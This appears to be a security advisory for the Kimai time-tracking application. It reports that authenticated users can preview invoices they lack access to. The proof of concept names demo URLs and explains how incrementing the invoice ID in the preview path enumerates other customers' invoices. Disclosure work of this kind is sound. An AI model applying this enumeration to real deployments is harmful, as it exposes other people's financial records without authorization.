Description

Authenticated users can preview invoices which they do not have read access to

Proof of Concept

To demonstrate this vulnerability, we will use tony_teamlead on the demo site.

1: Login as tony_teamlead.

2: Go to Invoices page, see that there is no Haley-Jaskolski invoice document present on the UI.

3: But if tony_teamlead visits https://demo.kimai.org/en/invoice/preview/4/4, they will be able to see Haley-Jaskolski’s invoice document. On the demo-stable website if tony_teamlead visits https://demo-stable.kimai.org/en/invoice/preview/1/4, they will see Crooks Group’s document even though they do not have access to it.

4: Attackers can increment the invoice_id up and down - https://demo.kimai.org/en/invoice/preview/{invoice_id}/{file_export_format}, to retrieve invoice documents they do not have access to.

Impact

Authenticated users can access potentially sensitive financial information they do not have access to